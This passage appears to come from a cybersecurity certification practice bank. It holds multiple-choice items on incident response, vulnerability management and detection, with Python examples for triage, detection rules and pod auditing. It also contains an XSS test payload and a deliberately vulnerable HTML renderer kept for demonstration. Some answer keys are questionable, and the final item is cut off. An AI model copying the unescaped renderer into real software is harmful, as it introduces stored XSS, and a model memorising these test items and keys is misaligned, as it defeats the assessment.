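    """The 'before': stored text is placed in an HTML body context with no output encoding."""
    rows = "".join(f"<li><b>{c['author']}</b>: {c['text']}</li>" for c in COMMENTS)
    return f"<ul>{rows}</ul>"

def render_fixed() -> str:
    """The fix: contextual output encoding for an HTML body context. A different context
    (attribute value, JavaScript string, URL) would need its own encoder, which is why the
    finding must name the context."""
    rows = "".join(f"<li><b>{html.escape(c['author'])}</b>: {html.escape(c['text'])}</li>"
                   for c in COMMENTS)
    return f"<ul>{rows}</ul>"

# Harmless marker; a DAST tool would use a unique token it can search for in responses.
CANARY = '<script>alert("xss-canary")</script>'

def confirm_stored_xss(render) -> dict:
    """Replay the scanner's finding: attacker stores the payload, then the page is rendered as
    it would be for a second user. Exploitable means the raw payload survived into that page."""
    COMMENTS.clear()
    store_comment("attacker", CANARY)
    store_comment("bob", "looks fine to me")
    persisted = any(c["text"] == CANARY for c in COMMENTS)
    victim_view = render()                       # what any other user would receive
    executes = CANARY in victim_view             # raw tag present: the browser would run it
    encoded = html.escape(CANARY) in victim_view # encoded form present: rendered as text
    return {"persisted": persisted, "executes_for_other_user": executes, "encoded_in_output": encoded}

if __name__ == "__main__":
    print("vulnerable:", confirm_stored_xss(render_vulnerable))
    print("fixed:     ", confirm_stored_xss(render_fixed))
```

Only the first result is evidence of exploitability; the second shows the same stored input rendered harmlessly, which is the state a retest should reach before the finding is closed.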

878
MCQhard

A company's incident response team is handling a ransomware incident that has encrypted all files on the file server and spread to several workstations. The team has isolated the affected systems and obtained memory dumps and disk images. The CEO demands immediate restoration of operations and suggests paying the ransom to decrypt files quickly. The company has recent backups but they are stored on a network share that was also encrypted. The CISO wants to ensure that the root cause is identified before restoration. As the lead incident responder, which of the following actions should you take NEXT?

A.Pay the ransom and then restore from the decrypted files
B.Restore the backups to a clean environment and then reimage the affected systems
C.Immediately reimage all affected systems and restore from the most recent clean backups
D.Analyze the memory dumps to identify the infection vector and check for persistence mechanisms
AnswerD

Root cause analysis ensures that the vulnerability is fixed before restoration.

Why this answer

Option D is correct because analyzing the memory dumps will help identify the initial infection vector (e.g., phishing email, exploited vulnerability) and any persistence mechanisms. This information is critical to prevent reinfection after restoration, which is exactly the CISO's concern. Options A and C skip root cause analysis, risking reinfection; paying the ransom also funds the attacker and does not guarantee working decryption.

Option B is premature for the same reason, and it has a practical problem: the backups sat on a share that was encrypted, so they must first be verified as intact (or an offline or immutable copy located) before they can anchor any recovery.

879
MCQmedium

A security analyst is reviewing a vulnerability scan report from Rapid7 InsightVM. The report shows that a Tomcat server has a plugin finding indicating that the 'Server' header is set to 'Apache-Coyote/1.1', which reveals the server version. Which type of vulnerability does this represent?

A.Broken access control
B.Injection vulnerability
C.Security misconfiguration
D.Cryptographic failure
AnswerC

Revealing server version is a misconfiguration that leaks information.

Why this answer

Revealing server version information is a form of information disclosure, which is a security misconfiguration. It is not an injection, broken access control, or cryptographic failure.

880
MCQeasy

A security analyst needs to verify that a critical patch was successfully applied to all endpoints in the organization after an emergency patch deployment. Which phase of the vulnerability lifecycle is the analyst performing?

A.Remediation
B.Prioritization
C.Discovery
D.Verification
AnswerD

Verification confirms the patch was applied successfully.

Why this answer

Verification ensures that remediation (patch application) was effective. It occurs after the fix is applied.

881
MCQmedium

An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?

A.Check the parent process of svchost.exe
B.Verify the IP address with threat intelligence feeds
C.Search for other workstations contacting the same IP
D.Isolate the workstation from the network immediately
AnswerA

svchost.exe is normally launched by services.exe from C:\Windows\System32; an unexpected parent or path points to masquerading, process injection, or LOLBin abuse.

Why this answer

Checking the parent process of svchost.exe is the quickest way to test the alert. A legitimate service host is spawned by services.exe with a -k service-group argument, so a parent such as explorer.exe, cmd.exe, an Office application, or a binary in a user-writable directory indicates a masquerading or injected process. The other options come later: threat-intelligence verification (B) only restates that the IP is known bad, searching other hosts (C) is scoping, and isolation (D) is containment, which follows confirmation unless the risk is obviously high.
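Worked example, added here and not part of the original question set: the parent-process check applied to a batch of constructed EDR process-creation records. Expected image path and parent are the Windows defaults; the records, PIDs and paths are invented for the example.

```python
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    pid: int
    image: str         # full path of the new process
    parent_image: str  # full path of the parent process
    cmdline: str

# Constructed EDR process-creation records for this example; not real telemetry.
EVENTS = [
    ProcessEvent(812, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"),
    ProcessEvent(4410, r"C:\Windows\System32\svchost.exe", r"C:\Users\jdoe\AppData\Local\Temp\update.exe",
                 "svchost.exe"),
    ProcessEvent(5120, r"C:\Users\jdoe\AppData\Roaming\svchost.exe", r"C:\Windows\explorer.exe",
                 "svchost.exe -k netsvcs"),
    ProcessEvent(6003, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p"),
]

EXPECTED_IMAGE = r"c:\windows\system32\svchost.exe"
EXPECTED_PARENT = r"c:\windows\system32\services.exe"

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess_svchost(ev: ProcessEvent) -> list:
    """Reasons this svchost.exe deviates from how Windows starts service hosts. An empty list
    means the genealogy looks normal; the C2 alert can still be a true positive through code
    injected into a legitimate svchost, so the loaded-module list is the next thing to check."""
    reasons = []
    if basename(ev.image) != "svchost.exe":
        return reasons
    if ev.image.lower() != EXPECTED_IMAGE:
        reasons.append(f"image path outside System32: {ev.image}")
    if ev.parent_image.lower() != EXPECTED_PARENT:
        reasons.append(f"unexpected parent: {basename(ev.parent_image)} ({ev.parent_image})")
    if " -k " not in f" {ev.cmdline.lower()} ":
        reasons.append("missing the '-k <service group>' argument that services.exe normally supplies")
    return reasons

def triage(events) -> dict:
    """Map pid -> list of deviations for every svchost.exe in the batch."""
    return {ev.pid: assess_svchost(ev) for ev in events if basename(ev.image) == "svchost.exe"}

def suspicious_pids(events) -> list:
    return sorted(pid for pid, reasons in triage(events).items() if reasons)

if __name__ == "__main__":
    for pid, reasons in triage(EVENTS).items():
        print(pid, "OK" if not reasons else "; ".join(reasons))
```

PIDs 4410 and 5120 are the ones to escalate: one is the real binary started by something in a Temp directory, the other is a look-alike dropped under the user's profile.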

882
MCQeasy

A security analyst is reviewing a vulnerability scan report and sees a critical finding with a CVSS v3.1 base score of 9.8. The vector string is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which of the following best describes the attack vector component (AV:N)?

A.The attacker can exploit the vulnerability over a network from a remote system
B.The attacker must be on the same physical network segment
C.The attacker requires local access to the target system
D.The attacker must be physically present at the device
AnswerA

AV:N indicates network-based remote exploitation.

Why this answer

AV:N means the vulnerability can be exploited over a network, such as the internet, without requiring physical or local access.

883
Multi-Selectmedium

A security analyst is investigating a reported vulnerability in a web application. The team uses Burp Suite for DAST scanning. Which TWO of the following findings would be classified as injection vulnerabilities according to OWASP Top 10?

Select 2 answers
A.Use of a component with known vulnerabilities
B.Broken access control allowing privilege escalation
C.Stored XSS in the comment section
D.Security misconfiguration exposing directory listing
E.SQL injection in the login form
AnswersC, E

XSS is an injection vulnerability (injection of scripts).

Why this answer

SQL injection and stored XSS are both injection flaws: SQL injection is the classic case, and the OWASP Top 10 2021 folds cross-site scripting into the A03:2021 Injection category. Options A, B and D map to separate Top 10 categories (vulnerable and outdated components, broken access control, security misconfiguration).

884
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?

A.True negative
B.True positive
C.False negative
D.False positive
AnswerD

The alert fired on benign activity, so it is a false positive.

Why this answer

The alert is a false positive because a single failed login followed by success is normal user behavior and not indicative of malicious activity.

885
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?

A.False negative
B.True positive
C.False positive
D.True negative
AnswerB

The alert correctly identified known malicious activity.

Why this answer

A true positive occurs when an alert correctly identifies malicious activity. The IP is confirmed as a C2 server, so the alert is valid.

886
Multi-Selectmedium

A security analyst is reviewing alerts from multiple security tools. Which three of the following are key indicators of a potential credential-based attack in the environment? (Choose three.)

Select 3 answers
A.Multiple failed logon attempts followed by a single successful logon from the same source IP address.
B.A single user account logging in from two geographically distant locations within a short time window.
C.An account that has been inactive for 90 days suddenly authenticating to a critical server.
D.A spike in outbound DNS traffic from a workstation during business hours.
E.An increase in the number of TCP SYN packets sent to a single external IP address.
F.A system event log showing a successful logon after a scheduled patch reboot.
AnswersA, B, C

Why this answer

Multiple failed logon attempts followed by a single successful logon from the same source IP address is a classic indicator of a password-spraying or brute-force attack: the attacker tries many usernames or passwords, and when one succeeds the pattern shifts from failures to a success. A single account authenticating from two distant locations inside a window too short to travel between them (impossible travel) indicates a stolen credential in use, and a dormant account suddenly authenticating to a critical server suggests an attacker reviving an account nobody is watching. DNS volume spikes and SYN bursts are exfiltration and scanning indicators, and a logon after a patch reboot is expected.

Exam trap

CompTIA often tests the distinction between credential-based attacks (e.g., brute-force, password spraying) and other attack types like reconnaissance (SYN scan) or data exfiltration (DNS tunneling), so candidates must focus on the authentication sequence rather than traffic volume or protocol anomalies.
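Worked example, added here and not part of the original question set: the three credential-attack indicators computed from a constructed authentication log. The events, IP addresses, coordinates (standing in for a GeoIP lookup) and the last-seen inventory are invented for the example; the thresholds (three failures in five minutes, 900 km/h, 90 days) are assumptions to tune for your environment.

```python
import math
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication events: (timestamp, user, src_ip, result, lat, lon). Not real logs.
AUTH_LOG = [
    ("2024-03-04T08:00:00", "jdoe", "203.0.113.7", "FAIL", 51.50, -0.12),
    ("2024-03-04T08:00:05", "jdoe", "203.0.113.7", "FAIL", 51.50, -0.12),
    ("2024-03-04T08:00:09", "jdoe", "203.0.113.7", "FAIL", 51.50, -0.12),
    ("2024-03-04T08:00:14", "jdoe", "203.0.113.7", "FAIL", 51.50, -0.12),
    ("2024-03-04T08:00:20", "jdoe", "203.0.113.7", "SUCCESS", 51.50, -0.12),
    ("2024-03-04T09:10:00", "asmith", "198.51.100.4", "SUCCESS", 40.71, -74.00),
    ("2024-03-04T09:40:00", "asmith", "192.0.2.88", "SUCCESS", 35.68, 139.69),
    ("2024-03-04T10:00:00", "svc_backup", "10.0.0.9", "SUCCESS", 0.0, 0.0),
    ("2024-03-04T10:05:00", "bwong", "10.0.0.31", "FAIL", 0.0, 0.0),
    ("2024-03-04T10:05:08", "bwong", "10.0.0.31", "SUCCESS", 0.0, 0.0),
]

# Assumed identity-inventory data: last known successful logon per account before this log.
LAST_SEEN = {"jdoe": "2024-03-03", "asmith": "2024-03-01", "svc_backup": "2023-11-20", "bwong": "2024-03-04"}

def ts(s: str) -> datetime:
    return datetime.fromisoformat(s)

def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance; enough precision for an impossible-travel test."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))

def brute_force_then_success(log, min_failures=3, window=timedelta(minutes=5)) -> list:
    """Indicator A: failures against one account from one source, then a success from that source."""
    by_key = defaultdict(list)
    for t, user, ip, result, *_ in log:
        by_key[(user, ip)].append((ts(t), result))
    hits = []
    for (user, ip), events in by_key.items():
        events.sort()
        for i, (t, result) in enumerate(events):
            if result != "SUCCESS":
                continue
            fails = [x for x, r in events[:i] if r == "FAIL" and t - x <= window]
            if len(fails) >= min_failures:
                hits.append((user, ip, len(fails)))
    return hits

def impossible_travel(log, max_kmh=900.0) -> list:
    """Indicator B: consecutive successes for one user that imply faster-than-airliner travel."""
    by_user = defaultdict(list)
    for t, user, ip, result, lat, lon in log:
        if result == "SUCCESS":
            by_user[user].append((ts(t), ip, lat, lon))
    hits = []
    for user, events in by_user.items():
        events.sort()
        for (t1, ip1, la1, lo1), (t2, ip2, la2, lo2) in zip(events, events[1:]):
            hours = (t2 - t1).total_seconds() / 3600
            km = haversine_km(la1, lo1, la2, lo2)
            if hours > 0 and km / hours > max_kmh:
                hits.append((user, ip1, ip2, round(km), round(km / hours)))
    return hits

def dormant_account_activity(log, last_seen, dormant_days=90) -> list:
    """Indicator C: a success for an account whose previous logon was dormant_days or more ago."""
    hits = []
    for t, user, ip, result, *_ in log:
        if result != "SUCCESS" or user not in last_seen:
            continue
        idle = (ts(t).date() - ts(last_seen[user]).date()).days
        if idle >= dormant_days:
            hits.append((user, ip, idle))
    return hits

if __name__ == "__main__":
    print(brute_force_then_success(AUTH_LOG))
    print(impossible_travel(AUTH_LOG))
    print(dormant_account_activity(AUTH_LOG, LAST_SEEN))
```

bwong's single failure followed by a success is deliberately below the threshold: that is the benign typo pattern from question 884, and the detector should not raise it.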

887
MCQmedium

A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?

A.To change the desktop wallpaper
B.To establish persistence
C.To disable Windows Defender
D.To update the system time
AnswerB

Run keys cause the specified program to run at every user logon, providing persistence.

Why this answer

Run keys are a common persistence mechanism: any value written under HKCU (or HKLM)\Software\Microsoft\Windows\CurrentVersion\Run is executed at every logon, which is why a new value there is worth triaging even when the writing process looks ordinary. The triage step is to read the value's data (the path being launched) and check whether that binary is signed and expected.
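Worked example, added here and not part of the original question set, serving both question 876 (the Sigma selector) and this one: a minimal Sigma-style matcher that evaluates a registry_set rule against constructed Sysmon Event ID 13 records. The rule is written for this example (it is not a copy of a specific SigmaHQ rule), the msiexec filter is an assumption about one environment's installer noise, and the events, SIDs and paths are invented. Sysmon records HKCU writes as HKU\<SID>\..., so the rule matches on the CurrentVersion\Run path rather than the hive name.

```python
# Sigma-style rule as the Python dict form of its YAML (constructed for this example).
RUN_KEY_RULE = {
    "title": "Autorun value written under CurrentVersion\\Run or RunOnce",
    "logsource": {"product": "windows", "category": "registry_set"},
    "detection": {
        "selection": {
            "EventID": 13,
            "TargetObject|contains": ["\\CurrentVersion\\Run\\", "\\CurrentVersion\\RunOnce\\"],
        },
        # Assumption: msiexec writes vendor autoruns during sanctioned installs in this environment.
        "filter_installer": {"Image|endswith": "\\msiexec.exe"},
        "condition": "selection and not filter_installer",
    },
}

# Constructed Sysmon Event ID 12/13 records; not real telemetry.
EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\jdoe\AppData\Roaming\upd.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 12, "Image": r"C:\Windows\System32\reg.exe",   # key created, no value set: not a match
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup", "Details": ""},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Cleanup",
     "Details": r"powershell -w hidden -File C:\Users\Public\c.ps1"},
]

def field_matches(event: dict, field_spec: str, wanted) -> bool:
    """One Sigma field test: 'Field|modifier': value-or-list (a list is OR). Case-insensitive."""
    field, _, modifier = field_spec.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    a = str(actual).lower()
    for w in (wanted if isinstance(wanted, list) else [wanted]):
        w = str(w).lower()
        if (modifier == "contains" and w in a) or (modifier == "endswith" and a.endswith(w)) \
           or (modifier == "startswith" and a.startswith(w)) or (modifier == "" and a == w):
            return True
    return False

def selection_matches(event: dict, selection: dict) -> bool:
    """All fields of a selection must match (AND)."""
    return all(field_matches(event, spec, val) for spec, val in selection.items())

def evaluate_condition(condition: str, results: dict) -> bool:
    """Left-to-right 'x and not y or z' over named selections; no parentheses (enough here)."""
    value, op, negate = None, "and", False
    for tok in condition.split():
        if tok in ("and", "or"):
            op = tok
        elif tok == "not":
            negate = True
        else:
            term = results[tok] ^ negate
            negate = False
            value = term if value is None else (value and term if op == "and" else value or term)
    return bool(value)

def rule_matches(rule: dict, event: dict) -> bool:
    det = rule["detection"]
    results = {name: selection_matches(event, sel) for name, sel in det.items() if name != "condition"}
    return evaluate_condition(det["condition"], results)

def find_persistence(events, rule=RUN_KEY_RULE) -> list:
    return [e for e in events if rule_matches(rule, e)]

if __name__ == "__main__":
    for hit in find_persistence(EVENTS):
        print(hit["Image"], "->", hit["TargetObject"], "=", hit["Details"])
```

The reg.exe and PowerShell writes are reported and the msiexec one is suppressed by the filter; the Explorer write under the same hive is ignored because the path is not an autorun key, and the Event ID 12 key creation is ignored because no value was set.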

888
MCQhard

During a vulnerability scan, the scanner reports a high number of open ports on a server that is supposed to be a hardened web server. The analyst investigates and finds that the server is running unnecessary services. Which of the following is the MOST effective long-term solution?

A.Implement a configuration management baseline and enforce it
B.Disable the unnecessary services manually
C.Increase the frequency of vulnerability scans
D.Install a host-based firewall to block the ports
AnswerA

Configuration management ensures consistent hardening and drift detection.

Why this answer

Implementing a configuration management baseline and enforcing it (Option A) is the most effective long-term solution because it ensures that the server is consistently provisioned with only the necessary services and configurations. This approach uses tools like Ansible, Puppet, or Chef to automatically remediate drift, preventing unnecessary services from reappearing after manual changes or reboots. It addresses the root cause by codifying the desired state, rather than relying on ad-hoc fixes.

Exam trap

CompTIA often tests the distinction between detection (scanning) and remediation (configuration management), and the trap here is that candidates choose a reactive control like a firewall or manual disabling instead of the proactive, automated enforcement that prevents the issue from recurring.

How to eliminate wrong answers

Option B is wrong because manually disabling unnecessary services is a temporary, non-scalable fix that does not prevent the services from being re-enabled during updates or reboots, and it lacks auditability and enforcement. Option C is wrong because increasing the frequency of vulnerability scans only detects the problem more often; it does not remediate the root cause of unnecessary services running. Option D is wrong because installing a host-based firewall to block ports only masks the vulnerability by hiding the open ports from scans, but the unnecessary services remain running and could still be exploited via local access or other attack vectors.

889
Multi-Selecthard

A threat intelligence analyst has produced a report containing specific Indicators of Compromise (IoCs) such as IP addresses, domain names, and file hashes. Which TWO audiences are most appropriate for this type of intelligence? (Select TWO.)

Select 2 answers
A.Board of directors
B.SOC analysts
C.Executive leadership
D.Incident responders
E.Network engineers
AnswersB, D

SOC uses IoCs for detection and alerting.

Why this answer

Tactical intelligence (IoCs) is most useful for the SOC team and incident responders who can use them for detection and response. Executives need strategic intelligence, and network engineers need operational intelligence.

890
MCQhard

A security analyst is reviewing the results of a container image scan using Trivy. The scan reports a critical vulnerability in a base image layer. The development team states that the vulnerability is not exploitable because the affected library is not used in the application. According to vulnerability management best practices, what should the analyst do?

A.Accept the risk and close the finding.
B.Request that the development team remove the unused library and rebuild the image.
C.Ignore the finding since it is not exploitable.
D.Apply a compensating control at the network level to block exploitation.
AnswerB

Removing the unused library and rebuilding eliminates the vulnerability.

Why this answer

Even when the application never calls the library, it remains in the image, in every future scan, and in the attack surface of the container, so the defensible path is to remove it (or move to a slimmer, patched base image), rebuild, and rescan to verify the finding is gone. Accepting or ignoring the finding on the developers' word alone leaves an unverified claim on the record; if removal is not possible, the "not exploitable" assertion should be documented with evidence and revisited when the base image changes. A network-level control (Option D) does not address a vulnerability whose reachability is unknown.

891
MCQhard

During a vulnerability assessment of a Kubernetes cluster, a security analyst finds that a container is running with privileged mode enabled and has a hostPath mount that grants write access to the host's /var/log directory. Which of the following is the most significant security risk associated with this configuration?

A.Data leakage through unrestricted storage access
B.Excessive network permissions allowing lateral movement
C.Potential for container escape and host node compromise
D.Increased attack surface due to unnecessary services running in the container
AnswerC

Privileged mode and hostPath mounts can facilitate escape.

Why this answer

A privileged container runs with all Linux capabilities and access to the host's devices, which by itself removes the isolation boundary (it can mount the node's disks); the writable hostPath to /var/log additionally lets it modify host files directly. The realistic outcome is root on the node and, from there, the credentials of every pod scheduled on it, which is why container escape and node compromise is the most significant risk.
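Worked example, added here and not part of the original question set: an audit function run over two constructed pod specs (Python dicts in the shape a YAML loader produces), the risky configuration from the question beside a hardened version of the same log-shipper pod. The pod name, image and mount paths are invented; the severities are the author's assumptions for ranking findings.

```python
# Constructed pod specs for this example; not taken from any real cluster.
RISKY_POD = {
    "metadata": {"name": "log-shipper"},
    "spec": {
        "containers": [{
            "name": "shipper",
            "image": "example/shipper:1.0",
            "securityContext": {"privileged": True},
            "volumeMounts": [{"name": "hostlogs", "mountPath": "/host/var/log"}],
        }],
        "volumes": [{"name": "hostlogs", "hostPath": {"path": "/var/log"}}],
    },
}

HARDENED_POD = {
    "metadata": {"name": "log-shipper"},
    "spec": {
        "containers": [{
            "name": "shipper",
            "image": "example/shipper:1.0",
            "securityContext": {
                "privileged": False,
                "allowPrivilegeEscalation": False,
                "readOnlyRootFilesystem": True,
                "runAsNonRoot": True,
                "capabilities": {"drop": ["ALL"]},
            },
            # A log shipper only needs to read the host's logs.
            "volumeMounts": [{"name": "hostlogs", "mountPath": "/host/var/log", "readOnly": True}],
        }],
        "volumes": [{"name": "hostlogs", "hostPath": {"path": "/var/log", "type": "Directory"}}],
    },
}

SEVERITY_RANK = {"LOW": 1, "MEDIUM": 2, "HIGH": 3, "CRITICAL": 4}

def audit_pod(pod: dict) -> list:
    """Return (container, severity, message) for the escape-relevant settings in a pod spec."""
    findings = []
    spec = pod.get("spec", {})
    host_paths = {v["name"]: v["hostPath"]["path"] for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        name = c.get("name", "?")
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append((name, "CRITICAL",
                             "privileged: true (host devices and all capabilities; escape is trivial)"))
        if sc.get("allowPrivilegeEscalation", True):   # Kubernetes default is true
            findings.append((name, "MEDIUM", "allowPrivilegeEscalation is not set to false"))
        for m in c.get("volumeMounts", []):
            if m["name"] not in host_paths:
                continue
            rw = not m.get("readOnly", False)
            findings.append((name, "HIGH" if rw else "LOW",
                             f"hostPath {host_paths[m['name']]} mounted "
                             f"{'read-write' if rw else 'read-only'} at {m['mountPath']}"))
    return findings

def worst_severity(findings: list) -> str:
    return max((f[1] for f in findings), key=SEVERITY_RANK.get, default="NONE")

if __name__ == "__main__":
    for pod in (RISKY_POD, HARDENED_POD):
        f = audit_pod(pod)
        print(pod["metadata"]["name"], worst_severity(f), f)
```

The hardened spec still carries a LOW finding for the read-only host mount; that is deliberate, since any hostPath is worth an explicit review even when it is the only way the workload can do its job.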

892
MCQhard

A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage?

A.Database transaction log backups
B.Physical badge access reviews
C.Wireless spectrum analysis
D.Software composition analysis in the CI/CD pipeline
AnswerD

SCA identifies vulnerable third-party dependencies and can gate builds before release.

Why this answer

Software Composition Analysis (SCA) is the correct control because it specifically scans open-source libraries for known vulnerabilities (CVEs) and license compliance issues. Integrating SCA into the CI/CD pipeline ensures vulnerabilities are detected and blocked before the code is deployed, aligning with the 'shift left' security principle. This directly addresses the team's goal of finding vulnerable open-source libraries pre-deployment.

Exam trap

CompTIA often tests the concept that 'shift left' security controls like SCA are distinct from operational or physical security controls, and the trap here is confusing vulnerability scanning of code with unrelated security processes like backups or physical access reviews.

How to eliminate wrong answers

Option A is wrong because database transaction log backups are a data recovery and integrity control, not a method for scanning open-source libraries for vulnerabilities. Option B is wrong because physical badge access reviews control physical access to facilities, not the security of software dependencies in a development pipeline. Option C is wrong because wireless spectrum analysis detects RF interference and rogue access points, not vulnerabilities in open-source code libraries.

893
MCQmedium

During a security incident, the incident response team has identified that a phishing email led to credential theft and lateral movement. Which component of the incident report should detail the sequence of events from initial compromise to containment?

A.Root cause analysis
B.Impact assessment
C.Lessons learned
D.Timeline
AnswerD

The timeline records the sequence of events.

Why this answer

The timeline component of an incident report provides a chronological sequence of events, which is essential for understanding how the incident unfolded.

894
MCQhard

An incident was contained successfully, but delayed escalation allowed the attacker more dwell time. What should the post-incident review produce?

A.A generic statement that security is important
B.Deletion of all incident tickets
C.A blame list of individual analysts
D.Specific playbook updates, escalation triggers, owners, and due dates
AnswerD

Lessons learned should translate findings into trackable process improvements.

Why this answer

Option D is correct because a post-incident review must produce actionable improvements to prevent recurrence. Delayed escalation indicates a failure in detection or notification procedures; therefore, specific playbook updates, escalation triggers, owners, and due dates directly address the root cause by refining incident response workflows and ensuring timely escalation in future incidents.

Exam trap

CompTIA often tests the misconception that post-incident reviews are about assigning blame or cleaning up records, when the correct focus is on process improvement through specific, measurable updates to the incident response plan.

How to eliminate wrong answers

Option A is wrong because a generic statement that security is important provides no concrete, measurable changes to processes or procedures, failing to correct the specific escalation delay. Option B is wrong because deletion of all incident tickets destroys forensic evidence and audit trails required for compliance, legal proceedings, and future analysis under frameworks like NIST SP 800-61. Option C is wrong because a blame list of individual analysts fosters a punitive culture, discourages reporting, and ignores systemic process failures that allowed the escalation delay, contrary to the post-incident review's goal of continuous improvement.

895
MCQeasy

A security analyst needs to share threat intelligence with other organizations in a standardized format. Which of the following standards should the analyst use?

A.REST
B.STIX/TAXII
C.SOAP
D.SNMP
AnswerB

STIX/TAXII are the standard for threat intelligence sharing.

Why this answer

STIX (Structured Threat Information Expression) is a standardized language for describing threat intelligence, and TAXII (Trusted Automated eXchange of Indicator Information) is a transport mechanism. Together, they enable sharing.

896
Multi-Selectmedium

A security analyst is configuring a compliance scanner to check Linux servers against the CIS Benchmark. The analyst wants to ensure that only foundational security configurations are enforced to avoid breaking production applications. Which TWO CIS Benchmark levels would be most appropriate for this environment? (Select TWO)

Select 2 answers
A.CIS Level 3 Benchmark
B.CIS Level 1 Benchmark
C.CIS Level 2 Benchmark
D.CIS Level 0 Benchmark
AnswersB, C

Level 1 is the basic security configuration.

Why this answer

CIS Benchmarks define two profiles: Level 1, the foundational configuration that is meant to be applied broadly with little risk to functionality, and Level 2, a defense-in-depth profile that can affect application behavior and should be tested before it is enforced. Of the options, only B and C are real profiles; "Level 0" and "Level 3" do not exist. Level 1 is the one that meets the stated requirement outright, with Level 2 items adopted selectively after testing.

897
MCQhard

During a forensic investigation, an analyst needs to acquire memory from a Linux server. Which tool is specifically designed for this purpose?

A.dd
B.LiME
C.FTK Imager
D.WinPmem
AnswerB

LiME is the Linux memory acquisition tool among the options.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that captures volatile memory from a running Linux system to a file or over the network, in a format memory-analysis tools such as Volatility can read. dd images disks and block devices, and modern kernels restrict reading physical memory through /dev/mem; FTK Imager and WinPmem are Windows tools.

898
MCQhard

During a post-incident activity, the CSIRT performs a root cause analysis for a data breach. They discover that the breach originated from a misconfigured S3 bucket that allowed public read access. Which of the following actions should be included in the lessons learned to prevent recurrence?

A.Rotate all access keys for the affected account
B.Disable public access to all S3 buckets permanently
C.Conduct a penetration test on the cloud environment
D.Implement automated compliance checks for cloud storage configurations
AnswerD

Automated checks prevent misconfigurations from going unnoticed.

Why this answer

Implementing automated compliance checks using tools like AWS Config ensures that storage configurations are continuously monitored and misconfigurations are flagged or corrected.

899
MCQmedium

A security analyst is reviewing a vulnerability scan report and finds a critical vulnerability with a CVSS v3.1 base score of 9.8. The vector string is: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which of the following best describes the attack vector and impact of this vulnerability?

A.Adjacent attack vector, high impact on availability only
B.Network attack vector, high impact on confidentiality, integrity, and availability
C.Physical attack vector, medium impact on confidentiality
D.Local attack vector, low impact on confidentiality
AnswerB

Option B reads the vector string correctly.

Why this answer

AV:N indicates a network attack vector, meaning the vulnerability can be exploited remotely over the network. The C:H/I:H/A:H impact ratings indicate complete loss of confidentiality, integrity, and availability, and with AC:L, PR:N and UI:N (no special conditions, no privileges, no user interaction) the base score reaches 9.8, the highest score possible without a scope change.

900
MCQhard

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal?

A.CVSS vector string
B.Sigma rule
C.YARA rule
D.OpenIOC package only
AnswerB

Sigma is designed as a generic detection-rule format that can be translated into SIEM-specific queries.

Why this answer

Sigma rules are the correct choice because they are a generic, open-source signature format for log events, which makes them portable across SIEM platforms (e.g., Splunk, Elastic, QRadar, Microsoft Sentinel) without vendor lock-in. For suspicious rundll32 execution, a Sigma rule describes the log pattern (typically Sysmon Event ID 1, or Security Event ID 4688 once command-line auditing is enabled, with an Image ending in rundll32.exe and suspicious arguments), and a converter such as sigma-cli with the pySigma backends turns it into each SIEM's native query language. This portability directly meets the threat hunter's goal of writing the detection once and reusing it across environments.

Exam trap

The CS0-003 exam often tests the distinction between detection artefacts (Sigma, YARA) and vulnerability scoring (CVSS), and the trap here is that candidates may confuse YARA's file-scanning capability with log-based SIEM detection, forgetting that YARA rules cannot be directly converted to SIEM queries without significant rework.

How to eliminate wrong answers

